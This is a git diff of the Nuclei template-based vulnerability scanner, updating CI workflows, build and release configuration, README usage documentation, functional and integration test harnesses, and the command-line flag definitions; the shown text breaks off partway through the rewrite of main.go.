diff --git a/.github/dependabot.yml b/.github/dependabot.yml index 4d5617f29d..69d95437c9 100644 --- a/.github/dependabot.yml +++ b/.github/dependabot.yml @@ -11,6 +11,7 @@ updates: directory: "/" schedule: interval: "weekly" + target-branch: "dev" commit-message: prefix: "chore" include: "scope" @@ -20,6 +21,7 @@ updates: directory: "/" schedule: interval: "weekly" + target-branch: "dev" commit-message: prefix: "chore" include: "scope" @@ -29,6 +31,7 @@ updates: directory: "/" schedule: interval: "weekly" + target-branch: "dev" commit-message: prefix: "chore" - include: "scope" + include: "scope" \ No newline at end of file diff --git a/.github/workflows/build-test.yml b/.github/workflows/build-test.yml new file mode 100644 index 0000000000..ddf318bea6 --- /dev/null +++ b/.github/workflows/build-test.yml @@ -0,0 +1,31 @@ +name: 🔨 Build Test +on: + push: + pull_request: + workflow_dispatch: + + +jobs: + build: + name: Test Builds + runs-on: ubuntu-latest + steps: + - name: Set up Go + uses: actions/setup-go@v2 + with: + go-version: 1.15 + + - name: Check out code + uses: actions/checkout@v2 + + - name: Test + run: go test ./... + working-directory: v2/ + + - name: Integration Tests + run: bash run.sh + working-directory: integration_tests/ + + - name: Build + run: go build . + working-directory: v2/cmd/nuclei/ \ No newline at end of file diff --git a/.github/workflows/build.yaml b/.github/workflows/build.yaml deleted file mode 100644 index 2020dd10a3..0000000000 --- a/.github/workflows/build.yaml +++ /dev/null @@ -1,45 +0,0 @@ -name: Build -on: - push: - branches: - - master - pull_request: - -jobs: - lint: - name: golangci-lint - runs-on: ubuntu-latest - steps: - - name: Checkout code - uses: actions/checkout@v2 - - name: Run golangci-lint - uses: golangci/golangci-lint-action@v2.5.2 - with: - # Required: the version of golangci-lint is required and must be specified without patch version: we always use the latest patch version. - version: v1.33 - args: --timeout 5m - working-directory: v2/ - - build: - name: Build - runs-on: ubuntu-latest - steps: - - name: Set up Go - uses: actions/setup-go@v2 - with: - go-version: 1.15 - - - name: Check out code - uses: actions/checkout@v2 - - - name: Test - run: go test ./... - working-directory: v2/ - - - name: Integration Tests - run: bash run.sh - working-directory: integration_tests/ - - - name: Build - run: go build . - working-directory: v2/cmd/nuclei/ diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml new file mode 100644 index 0000000000..545cdea93a --- /dev/null +++ b/.github/workflows/codeql-analysis.yml @@ -0,0 +1,38 @@ +name: 🚨 CodeQL Analysis + +on: + workflow_dispatch: + pull_request: + branches: + - dev + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: [ 'go' ] + # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ] + + steps: + - name: Checkout repository + uses: actions/checkout@v2 + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v1 + with: + languages: ${{ matrix.language }} + + - name: Autobuild + uses: github/codeql-action/autobuild@v1 + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v1 \ No newline at end of file diff --git a/.github/workflows/dockerhub-push.yml b/.github/workflows/dockerhub-push.yml index 8a93961a50..f201dc1b88 100644 --- a/.github/workflows/dockerhub-push.yml +++ b/.github/workflows/dockerhub-push.yml @@ -1,19 +1,34 @@ -# dockerhub-push pushes docker build to dockerhub automatically -# on the creation of a new release -name: Publish to Dockerhub on creation of a new release -on: +name: 🌥 Docker Push + +on: release: types: [published] + workflow_dispatch: + jobs: - update: + docker: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master - - name: Publish to Dockerhub Registry - #pre: echo ::save-state name=RELEASE_VERSION::$(echo ${GITHUB_REF:10}) - uses: elgohr/Publish-Docker-Github-Action@master - with: - name: projectdiscovery/nuclei - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_PASSWORD }} - tags: "latest" #"latest,${{ env.STATE_RELEASE_VERSION }}" + - + name: Checkout + uses: actions/checkout@v2 + - + name: Set up QEMU + uses: docker/setup-qemu-action@v1 + - + name: Set up Docker Buildx + uses: docker/setup-buildx-action@v1 + - + name: Login to DockerHub + uses: docker/login-action@v1 + with: + username: ${{ secrets.DOCKER_USERNAME }} + password: ${{ secrets.DOCKER_TOKEN }} + - + name: Build and push + uses: docker/build-push-action@v2 + with: + context: . + platforms: linux/amd64,linux/arm64,linux/arm + push: true + tags: projectdiscovery/nuclei:latest \ No newline at end of file diff --git a/.github/workflows/functional-test.yml b/.github/workflows/functional-test.yml new file mode 100644 index 0000000000..de2a43c931 --- /dev/null +++ b/.github/workflows/functional-test.yml @@ -0,0 +1,25 @@ +name: 🧪 Functional Test +on: + push: + pull_request: + workflow_dispatch: + + +jobs: + build: + name: Functional Test + runs-on: ubuntu-latest + steps: + - name: Set up Go + uses: actions/setup-go@v2 + with: + go-version: 1.15 + + - name: Check out code + uses: actions/checkout@v2 + + - name: Functional Tests + run: | + chmod +x run.sh + bash run.sh + working-directory: v2/cmd/functional-test \ No newline at end of file diff --git a/.github/workflows/lint-test.yml b/.github/workflows/lint-test.yml new file mode 100644 index 0000000000..ad6dd61166 --- /dev/null +++ b/.github/workflows/lint-test.yml @@ -0,0 +1,19 @@ +name: 🙏🏻 Lint Test +on: + push: + pull_request: + workflow_dispatch: + +jobs: + lint: + name: Lint Test + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v2 + - name: Run golangci-lint + uses: golangci/golangci-lint-action@v2 + with: + version: latest + args: --timeout 5m + working-directory: v2/ \ No newline at end of file diff --git a/.github/workflows/release.yml b/.github/workflows/release-binary.yml similarity index 84% rename from .github/workflows/release.yml rename to .github/workflows/release-binary.yml index 822994122c..7bc3cc13c3 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release-binary.yml @@ -1,8 +1,9 @@ -name: Release +name: 🎉 Release Binary on: create: tags: - v* + workflow_dispatch: jobs: release: @@ -17,7 +18,7 @@ jobs: name: "Set up Go" uses: actions/setup-go@v2 with: - go-version: 1.15 + go-version: 1.16 - env: GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" @@ -26,5 +27,4 @@ jobs: with: args: "release --rm-dist" version: latest - workdir: v2/ - \ No newline at end of file + workdir: v2/ \ No newline at end of file diff --git a/.gitignore b/.gitignore index 10f5c008e3..e812e00d2b 100644 --- a/.gitignore +++ b/.gitignore @@ -3,4 +3,11 @@ v2/cmd/nuclei/nuclei .idea integration_tests/integration-test integration_tests/nuclei -v2/cmd/integration-test/integration-test \ No newline at end of file +v2/cmd/integration-test/integration-test +bin +v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.class +v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.class +v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject2.ser +v2/cmd/functional-test/nuclei_dev +v2/cmd/functional-test/nuclei_main +v2/cmd/functional-test/functional-test \ No newline at end of file diff --git a/.golangci.yml b/.golangci.yml index 6c88a19f1b..9a2621ab41 100644 --- a/.golangci.yml +++ b/.golangci.yml @@ -66,7 +66,6 @@ linters: - gocritic - gofmt - goimports - - golint #- gomnd - goprintffuncname - gosimple @@ -89,6 +88,7 @@ linters: - unused - varcheck - whitespace + - revive # don't enable: # - depguard @@ -105,11 +105,4 @@ linters: # - nestif # - prealloc # - testpackage - # - wsl - -# golangci.com configuration -# https://github.com/golangci/golangci/wiki/Configuration -service: - golangci-lint-version: 1.33.x # use the fixed version to not introduce new linters unexpectedly - prepare: - - echo "here I can run custom commands, but no preparation needed for this repo" + # - wsl \ No newline at end of file diff --git a/Dockerfile b/Dockerfile index 6dda403a98..d915a432ea 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15-alpine as build-env +FROM golang:1.16.6-alpine as build-env RUN GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei FROM alpine:latest diff --git a/README.md b/README.md index 49cfb9fda9..53bb5e800f 100644 --- a/README.md +++ b/README.md @@ -11,8 +11,8 @@ - - + +

@@ -45,33 +45,152 @@ We have a [dedicated repository](https://github.com/projectdiscovery/nuclei-temp # Install Nuclei ```sh -▶ GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei +GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei ``` -**More installation [methods can be found here](https://nuclei.projectdiscovery.io/nuclei/get-started/#nuclei-installation).** +**More installation [methods can be found here](https://nuclei.projectdiscovery.io/nuclei/get-started/).**
-### Download Templates +### Nuclei Templates -You can download and update the nuclei templates using *update-templates* flag of nuclei that downloads all the available **nuclei-templates** from [Github project](https://github.com/projectdiscovery/nuclei-templates), a community curated list of templates that are ready to use. +Nuclei has had built-in support for automatic update/download templates since version [v2.4.0](https://github.com/projectdiscovery/nuclei/releases/tag/v2.4.0). [**Nuclei-Templates**](https://github.com/projectdiscovery/nuclei-templates) project provides a community-contributed list of ready-to-use templates that is constantly updated. -`▶ nuclei -update-templates` - -Nuclei is designed to used with custom templates according to the target and workflow, you can write your own checks for your specific workflow and needs, please refer to nuclei [templating guide](https://nuclei.projectdiscovery.io/templating-guide/) to write your own custom templates. +You may still use the `update-templates` flag to update the nuclei templates at any time; automatic updates happen every 24 hours. You can write your own checks for your individual workflow and needs following Nuclei's [templating guide](https://nuclei.projectdiscovery.io/templating-guide/).
+### Usage + +```sh +nuclei -h +``` + +This will display help for the tool. Here are all the switches it supports. + + +```yaml +Nuclei is a fast, template based vulnerability scanner focusing +on extensive configurability, massive extensibility and ease of use. + +Usage: + ./nuclei [flags] + +Flags: +TARGET: + -u, -target string[] target URLs/hosts to scan + -l, -list string path to file containing a list of target URLs/hosts to scan (one per line) + +TEMPLATES: + -tl list all available templates + -t, -templates string[] template or template directory paths to include in the scan + -w, -workflows string[] list of workflows to run + -nt, -new-templates run newly added templates only + -validate validate the passed templates to nuclei + +FILTERING: + -tags string[] execute a subset of templates that contain the provided tags + -include-tags string[] tags from the default deny list that permit executing more intrusive templates + -etags, -exclude-tags string[] exclude templates with the provided tags + -include-templates string[] templates to be executed even if they are excluded either by default or configuration + -exclude-templates, -exclude string[] template or template directory paths to exclude + -severity, -impact string[] execute templates that match the provided severities only + -author string[] execute templates that are (co-)created by the specified authors + +OUTPUT: + -o, -output string output file to write found issues/vulnerabilities + -silent display findings only + -v, -verbose show verbose output + -vv display extra verbose information + -nc, -no-color disable output content coloring (ANSI escape codes) + -json write output in JSONL(ines) format + -irr, -include-rr include request/response pairs in the JSONL output (for findings only) + -nm, -no-meta don't display match metadata + -rdb, -report-db string local nuclei reporting database (always use this to persist report data) + -me, -markdown-export string directory to export results in markdown format + -se, -sarif-export string file to export results in SARIF format + +CONFIGURATIONS: + -config string path to the nuclei configuration file + -rc, -report-config string nuclei reporting module configuration file + -H, -header string[] custom headers in header:value format + -r, -resolvers string file containing resolver list for nuclei + -system-resolvers use system DNS resolving as error fallback + -passive enable passive HTTP response processing mode + +INTERACTSH: + -no-interactsh do not use interactsh server for blind interaction polling + -interactsh-url string self-hosted Interactsh Server URL (default "https://interact.sh") + -interactions-cache-size int number of requests to keep in the interactions cache (default 5000) + -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60) + -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5) + -interactions-cooldown-period int extra time for interaction polling before exiting (default 5) + +RATE-LIMIT: + -rl, -rate-limit int maximum number of requests to send per second (default 150) + -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25) + -c, -concurrency int maximum number of templates to be executed in parallel (default 10) + +OPTIMIZATIONS: + -timeout int time to wait in seconds before timeout (default 5) + -retries int number of times to retry a failed request (default 1) + -project use a project folder to avoid sending same request multiple times + -project-path string set a specific project path (default "/var/folders/ml/m31ysb5x73l1s3kjlyn5g4180000gn/T/") + -spm, -stop-at-first-path stop processing HTTP requests after the first match (may break template/workflow logic) + +HEADLESS: + -headless enable templates that require headless browser support + -page-timeout int seconds to wait for each page in headless mode (default 20) + -show-browser show the browser on the screen when running templates with headless mode + +DEBUG: + -debug show all requests and responses + -debug-req show all sent requests + -debug-resp show all received responses + -proxy, -proxy-url string URL of the HTTP proxy server + -proxy-socks-url string URL of the SOCKS proxy server + -trace-log string file to write sent requests trace log + -version show nuclei version + -tv, -templates-version shows the version of the installed nuclei-templates + +UPDATE: + -update update nuclei to the latest released version + -ut, -update-templates update the community templates to latest released version + -ud, -update-directory string overwrite the default nuclei-templates directory (default "$HOME/nuclei-templates") + +STATISTICS: + -stats display statistics about the running scan + -stats-json write statistics data to an output file in JSONL(ines) format + -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5) + -metrics expose nuclei metrics on a port + -metrics-port int port to expose nuclei metrics on (default 9092) +``` + ### Running Nuclei -Scanning for CVEs on given list of URLs. +Scanning target domain with [community-curated](https://github.com/projectdiscovery/nuclei-templates) nuclei templates. ```sh -▶ nuclei -l target_urls.txt -t cves/ +nuclei -u https://example.com +``` + +Scanning target URLs with [community-curated](https://github.com/projectdiscovery/nuclei-templates) nuclei templates. + +```sh +nuclei -list urls.txt +``` + +Example of `urls.txt`: + +```yaml +http://example.com +http://app.example.com +http://test.example.com +http://uat.example.com ``` **More detailed examples of running nuclei can be found [here](https://nuclei.projectdiscovery.io/nuclei/get-started/#running-nuclei).** @@ -94,7 +213,7 @@ Nuclei offers great number of features that are helpful for security engineers t **For bugbounty hunters:** -Nuclei allows you to customise your testing approach with your own suite of checks and easily run across your bug bounty programs. Moroever, Nuclei can be easily integrated into any continuous scanning workflow. +Nuclei allows you to customise your testing approach with your own suite of checks and easily run across your bug bounty programs. Moreover, Nuclei can be easily integrated into any continuous scanning workflow. - Designed to be easily integrated into other tool workflow. - Can process thousands of hosts in few minutes. @@ -147,8 +266,10 @@ We have [a discussion thread around this](https://github.com/projectdiscovery/nu - [Community Powered Scanning with Nuclei](https://blog.projectdiscovery.io/community-powered-scanning-with-nuclei/) - [Nuclei Unleashed - Quickly write complex exploits](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/) - [Nuclei - Fuzz all the things](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-things/) +- [Nuclei + Interactsh Integration for Automating OOB Testing](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) - [Weaponizes nuclei Workflows to Pwn All the Things](https://medium.com/@dwisiswant0/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77) by [@dwisiswant0](https://github.com/dwisiswant0) - [How to Scan Continuously with Nuclei?](https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9) by [@dwisiswant0](https://github.com/dwisiswant0) +- [Hack with Automation !!!](https://dhiyaneshgeek.github.io/web/security/2021/07/19/hack-with-automation/) by [@DhiyaneshGeek](https://github.com/DhiyaneshGeek) ### Credits @@ -161,5 +282,5 @@ Thanks to all the amazing community [contributors for sending PRs](https://githu Nuclei is distributed under [MIT License](https://github.com/projectdiscovery/nuclei/blob/master/LICENSE.md)

- Join Discord Check Nuclei Documentation + Join Discord Check Nuclei Documentation

diff --git a/README_CN.md b/README_CN.md index f89fe5c985..04138acd21 100644 --- a/README_CN.md +++ b/README_CN.md @@ -97,7 +97,7 @@ nuclei -h |burp-collaborator-biid|使用burp-collaborator插件|nuclei -burp-collaborator-biid XXXX| |c|并行的最大模板数量(默认10)|nuclei -c 10| |l|对URL列表进行测试|nuclei -l urls.txt| -|target|对目标进行测试|nuclei -target hxxps://example.com| +|target|对目标进行测试|nuclei -target hxxps://example.com -target hxxps://example2.com| |t|要检测的模板种类|nuclei -t git-core.yaml -t cves/| |no-color|输出不显示颜色|nuclei -no-color| |no-meta|不显示匹配的元数据|nuclei -no-meta| @@ -250,4 +250,4 @@ nano ~/nuclei-templates/.nuclei-ignore -------- -Nuclei是由[projectdiscovery](https://projectdiscovery.io)团队用🖤制作的,当然社区也贡献了很多,通过 **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)**文件以获取更多详细信息。 \ No newline at end of file +Nuclei是由[projectdiscovery](https://projectdiscovery.io)团队用🖤制作的,当然社区也贡献了很多,通过 **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)**文件以获取更多详细信息。 diff --git a/SECURITY.md b/SECURITY.md new file mode 100644 index 0000000000..fc8033f4fa --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,5 @@ +# Security Policy + +## Reporting a Vulnerability + +DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to security@projectdiscovery.io and we will acknowledge it within 3 working days. diff --git a/integration_tests/http/raw-unsafe-request.yaml b/integration_tests/http/raw-unsafe-request.yaml index 8a5739845a..0a84b91570 100644 --- a/integration_tests/http/raw-unsafe-request.yaml +++ b/integration_tests/http/raw-unsafe-request.yaml @@ -17,4 +17,4 @@ requests: matchers: - type: word words: - - "This is test-raw-unsafe request matcher." \ No newline at end of file + - "This is test raw-unsafe-matcher test" \ No newline at end of file diff --git a/integration_tests/run.sh b/integration_tests/run.sh index ed7afe5aa9..507f6f7ef9 100644 --- a/integration_tests/run.sh +++ b/integration_tests/run.sh @@ -2,10 +2,10 @@ cd ../v2/cmd/nuclei go build -cp nuclei ../../../integration_tests/nuclei +mv nuclei ../../../integration_tests/nuclei cd ../integration-test go build -cp integration-test ../../../integration_tests/integration-test +mv integration-test ../../../integration_tests/integration-test cd ../../../integration_tests ./integration-test if [ $? -eq 0 ] diff --git a/v2/.goreleaser.yml b/v2/.goreleaser.yml index f88edccdcc..e97cfc12a8 100644 --- a/v2/.goreleaser.yml +++ b/v2/.goreleaser.yml @@ -3,23 +3,31 @@ before: - go mod tidy builds: - - binary: nuclei - main: cmd/nuclei/main.go - goos: - - linux - - windows - - darwin - goarch: - - amd64 - - 386 - - arm - - arm64 - +- env: + - CGO_ENABLED=0 + goos: + - windows + - linux + - darwin + goarch: + - amd64 + - 386 + - arm + - arm64 + + ignore: + - goos: darwin + goarch: '386' + - goos: windows + goarch: 'arm' + + binary: '{{ .ProjectName }}' + main: cmd/nuclei/main.go + archives: - - id: tgz - format: tar.gz - replacements: - darwin: macOS - format_overrides: - - goos: windows - format: zip +- format: zip + replacements: + darwin: macOS + +checksum: + algorithm: sha256 \ No newline at end of file diff --git a/v2/cmd/functional-test/main.go b/v2/cmd/functional-test/main.go new file mode 100644 index 0000000000..1e54cda7e1 --- /dev/null +++ b/v2/cmd/functional-test/main.go @@ -0,0 +1,79 @@ +package main + +import ( + "bufio" + "flag" + "fmt" + "log" + "os" + "strings" + + "github.com/logrusorgru/aurora" + "github.com/pkg/errors" + "github.com/projectdiscovery/nuclei/v2/internal/testutils" +) + +var ( + success = aurora.Green("[✓]").String() + failed = aurora.Red("[✘]").String() + errored = false + + mainNucleiBinary = flag.String("main", "", "Main Branch Nuclei Binary") + devNucleiBinary = flag.String("dev", "", "Dev Branch Nuclei Binary") + testcases = flag.String("testcases", "", "Test cases file for nuclei functional tests") +) + +func main() { + flag.Parse() + + if err := runFunctionalTests(); err != nil { + log.Fatalf("Could not run functional tests: %s\n", err) + } + if errored { + os.Exit(1) + } +} + +func runFunctionalTests() error { + file, err := os.Open(*testcases) + if err != nil { + return errors.Wrap(err, "could not open test cases") + } + defer file.Close() + + scanner := bufio.NewScanner(file) + for scanner.Scan() { + text := strings.TrimSpace(scanner.Text()) + if text == "" { + continue + } + if err := runIndividualTestCase(text); err != nil { + errored = true + fmt.Fprintf(os.Stderr, "%s Test \"%s\" failed: %s\n", failed, text, err) + } else { + fmt.Printf("%s Test \"%s\" passed!\n", success, text) + } + } + return nil +} + +func runIndividualTestCase(testcase string) error { + parts := strings.Fields(testcase) + + var finalArgs []string + if len(parts) > 1 { + finalArgs = parts[1:] + } + mainOutput, err := testutils.RunNucleiBinaryAndGetLoadedTemplates(*mainNucleiBinary, finalArgs) + if err != nil { + return errors.Wrap(err, "could not run nuclei main test") + } + devOutput, err := testutils.RunNucleiBinaryAndGetLoadedTemplates(*devNucleiBinary, finalArgs) + if err != nil { + return errors.Wrap(err, "could not run nuclei dev test") + } + if mainOutput == devOutput { + return nil + } + return fmt.Errorf("%s main is not equal to %s dev", mainOutput, devOutput) +} diff --git a/v2/cmd/functional-test/run.sh b/v2/cmd/functional-test/run.sh new file mode 100644 index 0000000000..030b25443f --- /dev/null +++ b/v2/cmd/functional-test/run.sh @@ -0,0 +1,13 @@ +#!/bin/bash + +echo 'Building functional-test binary' +go build + +echo 'Building Nuclei binary from current branch' +go build -o nuclei_dev ../nuclei + +echo 'Installing latest release of nuclei' +GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei + +echo 'Starting Nuclei functional test' +./functional-test -main nuclei -dev ./nuclei_dev -testcases testcases.txt \ No newline at end of file diff --git a/v2/cmd/functional-test/testcases.txt b/v2/cmd/functional-test/testcases.txt new file mode 100644 index 0000000000..18bfd326a1 --- /dev/null +++ b/v2/cmd/functional-test/testcases.txt @@ -0,0 +1,51 @@ +{{binary}} +{{binary}} -tags cve +{{binary}} -tags cve,exposure +{{binary}} -tags cve,exposure -tags token +{{binary}} -tags cve,exposure -tags token,logs +{{binary}} -tags "cve","exposure" -tags "token","logs" +{{binary}} -tags 'cve','exposure' -tags 'token','logs' +{{binary}} -tags cve -severity high +{{binary}} -tags cve,exposure -severity high,critical +{{binary}} -tags cve,exposure -severity "high,critical,medium" +{{binary}} -tags cve -author geeknik +{{binary}} -tags cve -author geeknik,pdteam +{{binary}} -tags cve -author geeknik -severity high +{{binary}} -tags cve +{{binary}} -tags cve,exposure +{{binary}} -tags cve,exposure -tags token +{{binary}} -tags cve,exposure -tags token,logs +{{binary}} -tags "cve","exposure" -tags "token","logs" +{{binary}} -tags 'cve','exposure' -tags 'token','logs' +{{binary}} -tags cve -severity high +{{binary}} -tags cve,exposure -severity high,critical +{{binary}} -tags cve,exposure -severity "high,critical,medium" +{{binary}} -tags cve -author geeknik +{{binary}} -tags cve -author geeknik,pdteam +{{binary}} -tags cve -author geeknik -severity high +{{binary}} -tags cve,exposure -author geeknik,pdteam -severity high,critical +{{binary}} -tags "cve,exposure" -author "geeknik,pdteam" -severity "high,critical" +{{binary}} -tags cve -etags ssrf +{{binary}} -tags cve,exposure -etags ssrf,config +{{binary}} -tags cve,exposure -etags ssrf,config -severity high +{{binary}} -tags cve,exposure -etags ssrf,config -severity high -author geeknik +{{binary}} -tags cve,dos,fuzz +{{binary}} -tags cve -include-tags dos,fuzz +{{binary}} -tags cve -exclude-tags cve2020 +{{binary}} -tags cve -exclude-templates cves/2020/ +{{binary}} -tags cve -exclude-templates cves/2020/CVE-2020-9757.yaml +{{binary}} -tags cve -exclude-templates cves/2020/CVE-2020-9757.yaml -exclude-templates cves/2021/ +{{binary}} -t cves/ +{{binary}} -t cves/ -t exposures/ +{{binary}} -t cves/ -t exposures/ -tags config +{{binary}} -t cves/ -t exposures/ -tags config,ssrf +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli -exclude-templates cves/2021/ +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli -exclude-templates cves/2017/CVE-2017-7269.yaml +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli -include-templates cves/2017/CVE-2017-7269.yaml +{{binary}} -w workflows +{{binary}} -w workflows -author geeknik,pdteam +{{binary}} -w workflows -severity high,critical +{{binary}} -w workflows -author geeknik,pdteam -severity high,critical \ No newline at end of file diff --git a/v2/cmd/integration-test/http.go b/v2/cmd/integration-test/http.go index 9a078d8f1f..e23d740b2b 100644 --- a/v2/cmd/integration-test/http.go +++ b/v2/cmd/integration-test/http.go @@ -474,8 +474,7 @@ func (h *httpRawUnsafeRequest) Execute(filePath string) error { ts := testutils.NewTCPServer(func(conn net.Conn) { defer conn.Close() - - _, _ = conn.Write([]byte("HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 40\r\nContent-Type: text/plain; charset=utf-8\r\nDate: Thu, 25 Feb 2021 17:17:28 GMT\r\n\r\nThis is test-raw-unsafe request matcher.\r\n")) + _, _ = conn.Write([]byte("HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 36\r\nContent-Type: text/plain; charset=utf-8\r\n\r\nThis is test raw-unsafe-matcher test")) }) defer ts.Close() diff --git a/v2/cmd/integration-test/integration-test.go b/v2/cmd/integration-test/integration-test.go index 6b9e161c92..ad416b5c4e 100644 --- a/v2/cmd/integration-test/integration-test.go +++ b/v2/cmd/integration-test/integration-test.go @@ -13,6 +13,8 @@ var ( debug = os.Getenv("DEBUG") == "true" customTest = os.Getenv("TEST") protocol = os.Getenv("PROTO") + + errored = false ) func main() { @@ -36,13 +38,16 @@ func main() { err := test.Execute(file) if err != nil { fmt.Fprintf(os.Stderr, "%s Test \"%s\" failed: %s\n", failed, file, err) - os.Exit(1) + errored = true } else { fmt.Printf("%s Test \"%s\" passed!\n", success, file) } } } } + if errored { + os.Exit(1) + } } func errIncorrectResultsCount(results []string) error { diff --git a/v2/cmd/nuclei/issue-tracker-config.yaml b/v2/cmd/nuclei/issue-tracker-config.yaml index f69342c79c..3fffce4972 100644 --- a/v2/cmd/nuclei/issue-tracker-config.yaml +++ b/v2/cmd/nuclei/issue-tracker-config.yaml @@ -32,14 +32,16 @@ # issue-label: "" # jira contains configuration options for jira issue tracker -#jira: +#jira: +# # Cloud is the boolean which tells if Jira instance is running in the cloud or on-prem version is used +# cloud: true # # URL is the jira application url # url: "" -# # account-id is the account-id of the jira user +# # account-id is the account-id of the jira user or username in case of on-prem Jira # account-id: "" # # email is the email of the user for jira instance # email: "" -# # token is the token for jira instance. +# # token is the token for jira instance or password in case of on-prem Jira # token: "" # # project-name is the name of the project. # project-name: "" diff --git a/v2/cmd/nuclei/main.go b/v2/cmd/nuclei/main.go index afc48fc8df..2934955d05 100644 --- a/v2/cmd/nuclei/main.go +++ b/v2/cmd/nuclei/main.go @@ -24,79 +24,158 @@ func main() { if err != nil { gologger.Fatal().Msgf("Could not create runner: %s\n", err) } - nucleiRunner.RunEnumeration() + if nucleiRunner == nil { + return + } + if err := nucleiRunner.RunEnumeration(); err != nil { + gologger.Fatal().Msgf("Could not run nuclei: %s\n", err) + } + nucleiRunner.Close() } func readConfig() { home, _ := os.UserHomeDir() templatesDirectory := filepath.Join(home, "nuclei-templates") - set := goflags.New() - set.SetDescription(`Nuclei is a fast tool for configurable targeted scanning -based on templates offering massive extensibility and ease of use.`) - set.StringVar(&cfgFile, "config", "", "Nuclei configuration file") - set.BoolVar(&options.Metrics, "metrics", false, "Expose nuclei metrics on a port") - set.IntVar(&options.MetricsPort, "metrics-port", 9092, "Port to expose nuclei metrics on") - set.StringVarP(&options.Target, "target", "u", "", "URL to scan with nuclei") - set.StringSliceVarP(&options.Templates, "templates", "t", []string{}, "Templates to run, supports single and multiple templates using directory.") - set.StringSliceVarP(&options.Workflows, "workflows", "w", []string{}, "Workflows to run for nuclei") - set.StringSliceVarP(&options.AdvancedWorkflows, "advanced-workflows", "wa", []string{}, "Advanced workflows to run for nuclei") - set.StringSliceVarP(&options.ExcludedTemplates, "exclude", "et", []string{}, "Templates to exclude, supports single and multiple templates using directory.") - set.StringSliceVarP(&options.Severity, "severity", "impact", []string{}, "Templates to run based on severity, supports single and multiple severity.") - set.StringVarP(&options.Targets, "list", "l", "", "List of URLs to run templates on") - set.StringVarP(&options.Output, "output", "o", "", "File to write output to (optional)") - set.StringVar(&options.ProxyURL, "proxy-url", "", "URL of the proxy server") - set.StringVar(&options.ProxySocksURL, "proxy-socks-url", "", "URL of the proxy socks server") - set.BoolVar(&options.Silent, "silent", false, "Show only results in output") - set.BoolVar(&options.Version, "version", false, "Show version of nuclei") - set.BoolVarP(&options.Verbose, "verbose", "v", false, "Show verbose output") - set.BoolVarP(&options.NoColor, "no-color", "nc", false, "Disable colors in output") - set.IntVar(&options.Timeout, "timeout", 5, "Time to wait in seconds before timeout") - set.IntVar(&options.Retries, "retries", 1, "Number of times to retry a failed request") - set.StringSliceVarP(&options.CustomHeaders, "header", "H", []string{}, "Custom Header.") - set.BoolVar(&options.Debug, "debug", false, "Debugging request and responses") - set.BoolVar(&options.DebugRequests, "debug-req", false, "Debugging request") - set.BoolVar(&options.DebugResponse, "debug-resp", false, "Debugging response") - set.BoolVarP(&options.UpdateTemplates, "update-templates", "ut", false, "Download / updates nuclei community templates") - set.StringVar(&options.TraceLogFile, "trace-log", "", "File to write sent requests trace log") - set.StringVarP(&options.TemplatesDirectory, "update-directory", "ud", templatesDirectory, "Directory storing nuclei-templates") - set.BoolVar(&options.JSON, "json", false, "Write json output to files") - set.BoolVarP(&options.JSONRequests, "include-rr", "irr", false, "Write requests/responses for matches in JSON output") - set.BoolVar(&options.EnableProgressBar, "stats", false, "Display stats of the running scan") - set.BoolVar(&options.TemplateList, "tl", false, "List available templates") - set.IntVarP(&options.RateLimit, "rate-limit", "rl", 150, "Maximum requests to send per second") - set.BoolVarP(&options.StopAtFirstMatch, "stop-at-first-path", "spm", false, "Stop processing http requests at first match (this may break template/workflow logic)") - set.IntVarP(&options.BulkSize, "bulk-size", "bs", 25, "Maximum Number of hosts analyzed in parallel per template") - set.IntVarP(&options.TemplateThreads, "concurrency", "c", 10, "Maximum Number of templates executed in parallel") - set.BoolVar(&options.Project, "project", false, "Use a project folder to avoid sending same request multiple times") - set.StringVar(&options.ProjectPath, "project-path", "", "Use a user defined project folder, temporary folder is used if not specified but enabled") - 